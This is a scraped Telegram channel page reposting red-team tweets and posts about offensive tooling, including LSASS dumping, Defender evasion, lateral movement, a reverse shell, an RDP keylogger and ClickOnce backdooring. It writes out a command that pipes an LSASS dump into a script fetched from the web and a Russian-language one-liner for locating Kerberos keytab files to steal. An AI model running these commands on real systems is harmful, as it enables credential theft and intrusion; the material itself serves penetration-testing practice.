Offensive Xwitter
@OffensiveTwitter
19.4K subscribers
908 photos
48 videos
21 files
2.09K links
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://xn--r1a.website/OffensiveTwitter/546
Download Telegram
About
Blog
Apps
Platform
Join
Offensive Xwitter
19.4K subscribers
Offensive Xwitter
😈 [ k_sec, Kurt Baumgartner ]

we go deeper yet into OpTriangulation...

πŸ”— https://securelist.com/triangledb-triangulation-implant/110050/

funny thing, it reminds me of a simple string xor decoder that i wrote for purple lambert research a few years ago.
course, many malware families use the same obfuscation... 

#include <stdio.h>
#include <string.h>

int main(int argc, const char* argv[]){
    unsigned int i=0;
    unsigned char c1, c2, x1;
    const int s1[] = {0x76, 0x18, 0x6C, 0x08, 0x64, 0x08, 0x00};  //obfuscated string value here

    const int *s2 = malloc(sizeof(s1));
    memcpy(s2,s1,sizeof(s1));

    // simple xor between current and next value
    while (s2[i+1] != '\0') {
            c1 = (unsigned char) s1[i];
            c2 = (unsigned char) s2[i+1];
            x1 = c1 ^ c2;
            printf("%c", x1);
            i++;
    }
    printf("\n");

    return 0;
}

πŸ₯ [ tweet ]
πŸ‘2😁1
1.25K views
Offensive Xwitter
😈 [ pfiatde, pfiatde ]

Command detection in Powershell is not easy.
Some words about an obfuscated LSASS dumper command via comsvcs.
Plus some ways to circumvent deletion of the dump.

πŸ”— https://badoption.eu/blog/2023/06/21/dumpit.html
πŸ”— https://github.com/powerseb/PowerExtract

πŸ₯ [ tweet ]
πŸ‘1
1.33K views
Offensive Xwitter
😈 [ pdnuclei, nuclei ]

If you're not writing custom Nuclei templates, you're missing out! 😒

βš›οΈ In this blog post, we explore the power of nuclei custom templates and how creating your own is beneficial for users!

Don't miss out, read this πŸ‘‡

πŸ”— https://blog.projectdiscovery.io/if-youre-not-writing-custom-nuclei-templates-youre-missing-out/

πŸ₯ [ tweet ]
1.58K views
Offensive Xwitter
😈 [ R0h1rr1m, Furkan Gâksel ]

I developed a Fileless Lateral Movement tool called NimExec. It changes service configuration to execute the payload via manually crafted RPC packets. It's the improved version of @JulioUrena 's SharpNoPSExec with Pass the Hash support. Enjoy!

#infosec
https://t.co/G6xeyHVmnf

πŸ”— https://github.com/frkngksl/NimExec

πŸ₯ [ tweet ]
2.25K views
Offensive Xwitter
😈 [ BlWasp_, BlackWasp ]

New tool in Rust. To learn this langage, and the basics of Windows internals, I have coded a TLS over TCP reverse shell with advanced integrated features like load a PE or a shellcode, download/upload files, bypass the AMSI, or autopwn the world...
https://t.co/DQShWQbeRw

πŸ”— https://github.com/BlWasp/rs-shell

πŸ₯ [ tweet ]

https://github.com/BlWasp/rs-shell/blob/main/src/autopwn.rs πŸ—Ώ
1.52K viewsedited  
Offensive Xwitter
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ 0gtweet, Grzegorz Tworek ]

Netsh.exe relies on extensions taken from Registry, which means it may be used as a persistence.
And what, if you go one step further, extending netsh with a DLL allowing you to do whatever you want? Kinda #LOLBin 😎
Enjoy the C code and DLL, as usual: https://t.co/xfm1Mxaf4F

πŸ”— https://github.com/gtworek/PSBits/tree/master/NetShRun

πŸ₯ [ tweet ]
πŸ‘4
1.38K views
Offensive Xwitter
НСмного ΠΊΠΎΠ΄Π³ΠΎΠ»ΡŒΡ„Π° для парсинга Π²Ρ‹Π²ΠΎΠ΄Π° pypykatz πŸ€ͺ

pypykatz lsa minidump lsass.dmp 2>/dev/null | python3 <(wget -qO- https://gist.github.com/snovvcrash/d77a3ea5401498da95e1fab840122bea/raw/554b5621eed33be158c1583a17d50448964cefa8/pypyparse.py)


πŸ”— https://gist.github.com/snovvcrash/d77a3ea5401498da95e1fab840122bea
πŸ‘4😁3πŸ₯±1
1.32K views
Offensive Xwitter
😈 [ HakaiOffsec, Hakai Offsec ]

After some hard work, coffee has been released! Our newest Rust COFF Loader!
If you want to check it out:
Don’t forget to check our blog post for more details:

πŸ”— https://github.com/hakaioffsec/coffee
πŸ”— https://labs.hakaioffsec.com/coffee-a-coff-loader-made-in-rust/

πŸ₯ [ tweet ]
πŸ‘1
1.29K views
Offensive Xwitter
Forwarded from RedTeam brazzers (Миша)
ΠšΡ€Π°ΠΆΠ° KeyTab.

Π’ΠΎ врСмя тСстирования Π½Π° ΠΏΡ€ΠΎΠ½ΠΈΠΊΠ½ΠΎΠ²Π΅Π½ΠΈΠ΅ часто Π²ΡΡ‚Ρ€Π΅Ρ‡Π°ΡŽΡ‚ΡΡ систСмы Linux с настроСнным Keytab. Keytab Ρ…Ρ€Π°Π½ΠΈΡ‚ ΠΏΠ°Ρ€Ρ‹ ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏΠ°Π»Π° кСрбСроса ΠΈ Π΅Π³ΠΎ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… ΠΊΠ»ΡŽΡ‡Π΅ΠΉ. Π‘ ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ этих Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… ΠΊΠ»ΡŽΡ‡Π΅ΠΉ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ TGT. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ Ρ‡Π΅Π³ΠΎ появляСтся Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ Π·Π°ΠΏΡ€ΠΎΡΠΈΡ‚ΡŒ TGT Π½Π° имя ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏΠ°Π»Π° Π±Π΅Π· Π²Π²ΠΎΠ΄Π° пароля. Kerberos Π½Π° Linux ΡƒΠΆΠ΅ Π΄Π°Π»Π΅ΠΊΠΎ Π½Π΅ Ρ€Π΅Π΄ΠΊΠΎΡΡ‚ΡŒ - Π³Π΅Ρ‚Π΅Ρ€ΠΎΠ³Π΅Π½Π½Ρ‹Π΅ сСти становятся всС Π±ΠΎΠ»Π΅Π΅ популярными ΠΏΠΎ ряду ΠΏΡ€ΠΈΡ‡ΠΈΠ½. НапримСр, ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ Ρ‚Π°ΠΊΠΎΠΉ сцСнарий, Ρ‡Ρ‚ΠΎ Π½Π° Linux бСкапится содСрТимоС ΠΊΠ°ΠΊΠΎΠΉ-Π»ΠΈΠ±ΠΎ ΡˆΠ°Ρ€Ρ‹, ΠΏΡ€ΠΈ этом ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ доступ ΠΊ этой ΡˆΠ°Ρ€Π΅ ΠΌΠΎΠ³ΡƒΡ‚ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ Π΄ΠΎΠΌΠ΅Π½Π°. Π’ Ρ‚Π°ΠΊΠΎΠΌ случаС ΠΏΠΈΡˆΠ΅Ρ‚ΡΡ ΠΏΡ€ΠΎΡΡ‚Π΅Π½ΡŒΠΊΠΈΠΉ скрипт Π½Π° баш, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΌ рСализуСтся Π»ΠΎΠ³ΠΈΠΊΠ° ΠΏΠΎ запросу TGT Ρ‚ΠΈΠΊΠ΅Ρ‚Π° Π½Π° основС KeyTab, Π° Π·Π°Ρ‚Π΅ΠΌ копирования Ρ„Π°ΠΉΠ»ΠΎΠ² с ΡˆΠ°Ρ€Ρ‹. ΠŸΡ€ΠΈΡ‡Π΅ΠΌ для пСриодичности запуска скрипт добавляСтся Π² crontab.

Нам, ΠΊΠ°ΠΊ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΌ, ΠΊΠΎΠ½Π΅Ρ‡Π½ΠΎ ΠΆΠ΅, интСрСсСн процСсс запроса TGT Π±ΠΈΠ»Π΅Ρ‚Π° Π½Π° основС KeyTab. Для этого ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ kinit со ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ синтаксисом:
kinit –kt <keytab> <ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏΠ°Π»>

НапримСр, Ссли Ρ„Π°ΠΉΠ» /tmp/admin.keytab слуТит для Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ admin@OFFICE.LOCAL , Ρ‚ΠΎ Π΄Π΅Π»Π°Π΅ΠΌ Π²ΠΎΡ‚ Ρ‚Π°ΠΊ:
kinit -kt /tmp/admin.keytab admin@OFFICE.LOCAL

ΠžΡΡ‚Π°Π΅Ρ‚ΡΡ лишь ΠΎΠ΄Π½Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ° - ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠ΅ самих KeyTab Ρ„Π°ΠΉΠ»ΠΎΠ². ΠšΠΎΠ½Π΅Ρ‡Π½ΠΎ, ΠΌΠΎΠΆΠ½ΠΎ Ρ€ΡƒΡ‡ΠΊΠ°ΠΌΠΈ Ρ‡Π΅Ρ€Π΅Π· find ΠΈΡΠΊΠ°Ρ‚ΡŒ эти Ρ„Π°ΠΉΠ»Ρ‹, ΠΏΠΎΡ‚ΠΎΠΌ Ρ‚Π°ΠΊΠΆΠ΅ ΠΌΡƒΡ‚ΠΎΡ€Π½ΠΎ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΡΡ‚ΡŒ Ρ€Π°Π·Ρ€Π΅ΡˆΠ΅Π½ΠΈΡ Π½Π° Π½ΠΈΡ…, Ρ‡Ρ‚ΠΎ Π½Π΅ Π΅ΡΡ‚ΡŒ Ρ…ΠΎΡ€ΠΎΡˆΠΎ. ΠŸΠΎΡΡ‚ΠΎΠΌΡƒ я накалякал ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΉ ΠΊΠΎΠΌΠ°Π½Π΄Π»Π΅Ρ‚, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ автоматичСски Π½Π°ΠΉΠ΄Π΅Ρ‚ всС .keytab Ρ„Π°ΠΉΠ»Ρ‹ , Π° Π·Π°Ρ‚Π΅ΠΌ подсвСтит интСрСсныС Ρ€Π°Π·Π½Ρ‹ΠΌΠΈ Ρ†Π²Π΅Ρ‚Π°ΠΌΠΈ:
1. Π—Π΅Π»Π΅Π½Ρ‹ΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅Ρ‡ΠΈΠ²Π°ΡŽΡ‚ΡΡ Ρ‚Π΅ Ρ„Π°ΠΉΠ»Ρ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‚ Ρ‚Π΅ΠΊΡƒΡ‰Π΅ΠΌΡƒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ.
2. Π–Π΅Π»Ρ‚Ρ‹ΠΌ ΠΏΠΎΠ΄ΡΠ²Π΅Ρ‡ΠΈΠ²Π°ΡŽΡ‚ΡΡ Ρ‚Π΅ Ρ„Π°ΠΉΠ»Ρ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ, ΠΎΡ‚Π»ΠΈΡ‡Π½ΠΎΠΌΡƒ ΠΎΡ‚ Ρ‚Π΅ΠΊΡƒΡ‰Π΅Π³ΠΎ, ΠΏΡ€ΠΈ этом Ρ‚Π΅ΠΊΡƒΡ‰ΠΈΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ‚ достаточных ΠΏΡ€Π°Π² (Ρ‡Ρ‚Π΅Π½ΠΈΠ΅/запись) Π½Π° этот самый KeyTab.
3. НаконСц, красным ΠΏΠΎΠ΄ΡΠ²Π΅Ρ‡ΠΈΠ²Π°ΡŽΡ‚ΡΡ Ρ„Π°ΠΉΠ»Ρ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠ½Π°Π΄Π»Π΅ΠΆΠ°Ρ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ, ΠΎΡ‚Π»ΠΈΡ‡Π½ΠΎΠΌΡƒ ΠΎΡ‚ Ρ‚Π΅ΠΊΡƒΡ‰Π΅Π³ΠΎ, ΠΏΡ€ΠΈ этом Ρ‚Π΅ΠΊΡƒΡ‰ΠΈΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ ΠΈΠΌΠ΅Π΅Ρ‚ достаточныС ΠΏΡ€Π°Π²Π° Π½Π° этот самый KeyTab.

find / -iname '*.keytab' -type f -exec ls -l {} \; 2>/dev/null | awk -v user="$(whoami)" 'BEGIN { FS = OFS = " "; red = "\033[31m"; yellow = "\033[33m"; green = "\033[32m"; reset = "\033[0m" } { if ($3 == user && $9 ~ /.keytab$/) { printf green } else if ($3 != user && $9 ~ /.keytab$/ && $1 ~ /^-.w.r../) { printf red } else if ($3 != user && $9 ~ /.keytab$/ && ($1 !~ /^.w.r../ || $1 !~ /^-.w../)) { printf yellow } print $0; printf reset }'
πŸ”₯5πŸ‘1
980 views
Offensive Xwitter
😈 [ stephenfewer, Stephen Fewer ]

Last Friday's @metasploit release adds coverage for CVE-2023-34362 in MOVEit Transfer, great work by @tychos_moose, @iagox86, @_CField and team. Nice to see the new fetch payloads in action tooπŸ”₯Check out the release here:

πŸ”— https://www.rapid7.com/blog/post/2023/06/23/metasploit-weekly-wrap-up-16/

πŸ₯ [ tweet ]
😁2πŸ”₯1
1.39K views
Offensive Xwitter
😈 [ mpgn_x64, mpgn ]

3, 2, 1 CrackMapExec 6.0.0 is now public ! πŸŽ‰

So much new features and fix that I've made a blogpost for it ▢️


Special thanks to @_zblurx @MJHallenbeck & @al3x_n3ff for their indefectible support & contributions ! 🍻

πŸ”— https://wiki.porchetta.industries/news/a-new-home

πŸ₯ [ tweet ]
πŸ‘2πŸ”₯2
3.18K views
Offensive Xwitter
😈 [ _zblurx, Thomas Seigneuret ]

Want to bypass Windows Defender when dumping LSASS ? Just dump into .log filesπŸ˜…

πŸ₯ [ tweet ]
πŸ”₯4😁2πŸ‘1😒1
1.64K views
Offensive Xwitter
😈 [ kleiton0x7e, Kleiton Kurti ]

Came up with an improved version of WMIExec. By leveraging the Win32_ScheduledJob class, we can remotely create scheduled jobs. This way it's not required anymore to rely on port 139 and 445.

Github:

#CyberSecurity #redteam #infosec #infosecurity

πŸ”— https://github.com/WKL-Sec/wmiexec/

πŸ₯ [ tweet ]
πŸ”₯3
1.37K views
Offensive Xwitter
😈 [ passthehashbrwn, Josh ]

Just published a new blog post covering how to hide Beacon during BOF execution. If your BOF triggers a memory scan then EDR is likely to find Beacon and kill your process, but we can mask it using a simple technique.

πŸ”— https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/
πŸ”— https://github.com/xforcered/bofmask

πŸ₯ [ tweet ]
πŸ”₯3
1.36K viewsedited  
Offensive Xwitter
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ an0n_r0, an0n ]

Just recreated this awesome @SpecterOps (@zyn3rgy, @0xthirteen) technique for initial access by #backdooring a random #ClickOnce application with a Cobalt Strike stager. While I became a ClickOnce addictπŸ™ƒ, compiled a short writeup about my journey:

πŸ”— https://an0n-r0.medium.com/backdooring-clickonce-net-for-initial-access-a-practical-example-1eb6863c0579

πŸ₯ [ tweet ][ quote ]
πŸ‘7
1.54K views
Offensive Xwitter
Forwarded from Π’олосатый Π±ΡƒΠ±Π»ΠΈΠΊ
4 Π½ΠΎΠ²Ρ‹Ρ… Π²ΠΈΠ΄Π΅ΠΎ Π½Π° ΠΊΠ°Π½Π°Π»Π΅ SpecterOps

Security Distilled: Building a First-Principles Approach to Security
https://www.youtube.com/watch?v=zjJaYwqVHxY

A Taste of Kerberos Abuse
https://www.youtube.com/watch?v=9SUXifUp9ZY

The BloodHound 4.3 Release: Get Global Admin More Often
https://www.youtube.com/watch?v=H1q-CBHbmHE

Red + Blue, How Purple Are You? Identifying Gaps in The Spectrum of Security
https://www.youtube.com/watch?v=B_2AfoT2WxU
πŸ‘3πŸ”₯1
1.16K views
Offensive Xwitter
😈 [ ricnar456, Ricardo Narvaja ]

As promised, the research on CVE-2023-28252 is already published with its PoC and the detailed explanation of the reversing that we did with my friend @solidclt.

πŸ”— https://www.coresecurity.com/core-labs/articles/understanding-cve-2022-37969-windows-clfs-lpe
πŸ”— https://github.com/fortra/CVE-2023-28252

πŸ₯ [ tweet ]
πŸ”₯6
1.48K viewsedited  
Offensive Xwitter
This media is not supported in your browser
VIEW IN TELEGRAM
Долистал Ρ‚Π²ΠΈΡ‚Ρ‚Π΅Ρ€ Π΄ΠΎ Ρ€Π΅ΠΉΡ‚ Π»ΠΈΠΌΠΈΡ‚Π°, поэтому вмСсто постов ΠΏΡ€ΠΎ пСнСтрСсты Π²ΠΎΡ‚
😒8πŸ‘3πŸ”₯2
1.25K views
Offensive Xwitter
😈 [ VirtualAllocEx, Daniel Feichter ]

Although the Hell's Gate POC is a few years old, I was interested in understanding it in more detail.
So I wrote the new blog post "Exploring Hell's Gate" - an in-depth look at Hell's Gate.

πŸ”— https://redops.at/en/blog/exploring-hells-gate

πŸ₯ [ tweet ]
πŸ‘1
1.29K views
Offensive Xwitter
😈 [ _RastaMouse, Rasta Mouse ]

[BLOG]
Short post showing how C# Source Generators could be used to build customisable implants.

πŸ”— https://rastamouse.me/csharp-source-generators/

πŸ₯ [ tweet ]
πŸ‘1
1.23K views
Offensive Xwitter
😈 [ D1rkMtr, D1rkMtr ]

A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes, It utilizes a low-level keyboard input hook, allowing it to record keystrokes in certain contexts (like in mstsc.exe and CredentialUIBroker.exe)

πŸ”— https://github.com/TheD1rkMtr/TakeMyRDP

πŸ₯ [ tweet ]
πŸ‘4
1.22K views